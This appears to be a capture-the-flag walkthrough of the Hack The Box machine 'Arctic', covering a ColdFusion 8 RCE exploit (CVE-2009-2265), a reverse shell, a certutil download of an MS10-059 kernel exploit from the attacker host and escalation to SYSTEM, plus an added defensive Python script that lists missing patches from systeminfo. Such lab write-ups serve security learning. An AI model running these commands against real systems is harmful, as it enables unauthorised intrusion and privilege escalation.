Arctic

Very simple box. Almost pure automated tools. Great for beginners.

sudo nmap -sS -sV -p- -T4 -Pn -n --disable-arp-ping -v 10.10.10.11

PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
8500/tcp open fmtp?
49154/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Connecting to port 8500 via netcat resulted in an instant disconnect. Trying HTTP finds a web service, and it is frustratingly slow. I can see why this box is called Arctic.

curl http://10.10.10.11:8500/
<html>
<head>
<title>Index of /</title></head><body bgcolor="#ffffff">
<h1>Index of /</h1><br><hr><pre><a href="CFIDE/">CFIDE/</a> <i>dir</i> 03/22/17 08:52 μμ
<a href="cfdocs/">cfdocs/</a> <i>dir</i> 03/22/17 08:55 μμ
</pre><hr></html>

http://10.10.10.11:8500/CFIDE/administrator/

An exploit search returns an RCE vulnerability:

CVE-2009-2265

https://www.exploit-db.com/exploits/50057

python3 exploit.py

Printing some information for debugging...
lhost: 10.10.14.12
lport: 4444
rhost: 10.10.10.11
rport: 8500
payload: 1a64522d330c4653a6af856c85a99a3f.jsp

Deleting the payload...

Listening for connection...

Executing the payload...
listening on [any] 4444 ...
connect to [10.10.14.12] from (UNKNOWN) [10.10.10.11] 49250

Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\ColdFusion8\runtime\bin>whoami
whoami
arctic\tolis

I originally completed this box by popping a Meterpreter session with web delivery and using the exploit suggester, which used ms10_092_schelevator to get to SYSTEM. While writing this writeup, however, it did not want to play ball with my web delivery, so I will show an alternate path to SYSTEM.

Using Windows Exploit Suggester

Copying the systeminfo output into a local file:

Host Name: ARCTIC
OS Name: Microsoft Windows Server 2008 R2 Standard
OS Version: 6.1.7600 N/A Build 7600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 55041-507-9857321-84451
Original Install Date: 22/3/2017, 11:09:45
System Boot Time: 22/10/2021, 2:31:11
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: x64-based PC
Processor(s): 2 Processor(s) Installed.
[01]: Intel64 Family 6 Model 79 Step
[02]: Intel64 Family 6 Model 79 Step
BIOS Version: Phoenix Technologies LTD 6.00, 12/12
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: el;Greek
Input Locale: en-us;English (United States)
Time Zone: (UTC+02:00) Athens, Bucharest, Istan
Total Physical Memory: 1.023 MB
Available Physical Memory: 88 MB
Virtual Memory: Max Size: 2.047 MB
Virtual Memory: Available: 960 MB
Virtual Memory: In Use: 1.087 MB
Page File Location(s): C:\pagefile.sys
Domain: HTB
Logon Server: N/A
Hotfix(s): N/A
Network Card(s): 1 NIC(s) Installed.
[01]: Intel(R) PRO/1000 MT Network C
Connection Name: Local Area Co
DHCP Enabled: No
IP address(es)
[01]: 10.10.10.11

./windows-exploit-suggester.py --update

./windows-exploit-suggester.py --database 2021-10-18-mssb.xls --systeminfo systeminfo

[*] initiating winsploit version 3.3...
[*] database file detected as xls or xlsx based on extension
[*] attempting to read from the systeminfo input file
[+] systeminfo input file read successfully (utf-8)
[*] querying database file for potential vulnerabilities
[*] comparing the 0 hotfix(es) against the 197 potential bulletins(s) with a database of 137 known exploits
[*] there are now 197 remaining vulns
[+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin
[+] windows version identified as 'Windows 2008 R2 64-bit'
[*]
[M] MS13-009: Cumulative Security Update for Internet Explorer (2792100) - Critical
[M] MS13-005: Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of Privilege (2778930) - Important
[E] MS12-037: Cumulative Security Update for Internet Explorer (2699988) - Critical
[*] http://www.exploit-db.com/exploits/35273/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5., PoC
[*] http://www.exploit-db.com/exploits/34815/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5.0 Bypass (MS12-037), PoC
[*]
[E] MS11-011: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2393802) - Important
[M] MS10-073: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (981957) - Important
[M] MS10-061: Vulnerability in Print Spooler Service Could Allow Remote Code Execution (2347290) - Critical
[E] MS10-059: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege (982799) - Important
[E] MS10-047: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (981852) - Important
[M] MS10-002: Cumulative Security Update for Internet Explorer (978207) - Critical
[M] MS09-072: Cumulative Security Update for Internet Explorer (976325) - Critical
[*] done
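As an added example (not part of the original writeup or of the exploit suggester), the same comparison from the defender's side: a small Python parser for `systeminfo` output that reports which of the bulletins listed above have no matching KB installed. The bulletin-to-KB map is transcribed from the parenthesised numbers in the suggester output, and both systeminfo excerpts are constructed samples.

```python
import re

# Bulletin -> KB number, taken from the suggester output in the writeup.
BULLETIN_KB = {
    "MS13-009": "2792100", "MS13-005": "2778930", "MS12-037": "2699988",
    "MS11-011": "2393802", "MS10-073": "981957",  "MS10-061": "2347290",
    "MS10-059": "982799",  "MS10-047": "981852",  "MS10-002": "978207",
    "MS09-072": "976325",
}

def parse_systeminfo(text):
    """Return (os_version, set of installed KB numbers).

    Handles both `Hotfix(s): N/A` and the multi-line form
    `Hotfix(s): 2 Hotfix(s) Installed.` followed by `[01]: KB982799` lines."""
    os_version, hotfixes, in_block = None, set(), False
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("OS Version:"):
            os_version = line.split(":", 1)[1].strip()
        if line.startswith("Hotfix(s):"):
            in_block = "Installed" in line   # False for the N/A case
            continue
        if in_block:
            m = re.match(r"\[\d+\]:\s*KB(\d+)", line)
            if m:
                hotfixes.add(m.group(1))
            else:
                in_block = False             # next systeminfo section reached
    return os_version, hotfixes

def missing_bulletins(text, bulletin_kb=BULLETIN_KB):
    """Bulletins whose KB is absent from the installed hotfix list."""
    _, installed = parse_systeminfo(text)
    return sorted(b for b, kb in bulletin_kb.items() if kb not in installed)

# Constructed excerpt mirroring the box's listing (no hotfixes at all).
SAMPLE_UNPATCHED = """Host Name:                 ARCTIC
OS Version:                6.1.7600 N/A Build 7600
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
"""

# Constructed variant with two of the KBs applied, to exercise the other format.
SAMPLE_PARTIAL = """OS Version:                6.1.7601 Service Pack 1 Build 7601
Hotfix(s):                 2 Hotfix(s) Installed.
                           [01]: KB982799
                           [02]: KB2347290
Network Card(s):           1 NIC(s) Installed.
"""

if __name__ == "__main__":
    for name, sample in (("unpatched", SAMPLE_UNPATCHED), ("partial", SAMPLE_PARTIAL)):
        print(name, parse_systeminfo(sample)[0], missing_bulletins(sample))
```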

MS10-059 is a well-known kernel exploit. It can be downloaded from here:

https://github.com/SecWiki/windows-kernel-exploits

Upload the exe with certutil:

C:\Users\tolis\Downloads>certutil -urlcache -f http://10.10.14.12:5000/MS10-059.exe MS10-059.exe
**** Online ****
CertUtil: -URLCache command completed successfully.

C:\Users\tolis\Downloads>dir
dir
Volume in drive C has no label.
Volume Serial Number is F88F-4EA5

Directory of C:\Users\tolis\Downloads

22/10/2021 03:23 <DIR> .
22/10/2021 03:23 <DIR> ..
22/10/2021 03:24 784.384 MS10-059.exe
1 File(s) 784.384 bytes
2 Dir(s) 33.180.368.896 bytes free

C:\Users\tolis\Downloads>.\MS10-059.exe 10.10.14.12 6666
connect to [10.10.14.12] from (UNKNOWN) [10.10.10.11] 49410
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Users\tolis\Downloads>whoami
whoami
nt authority\system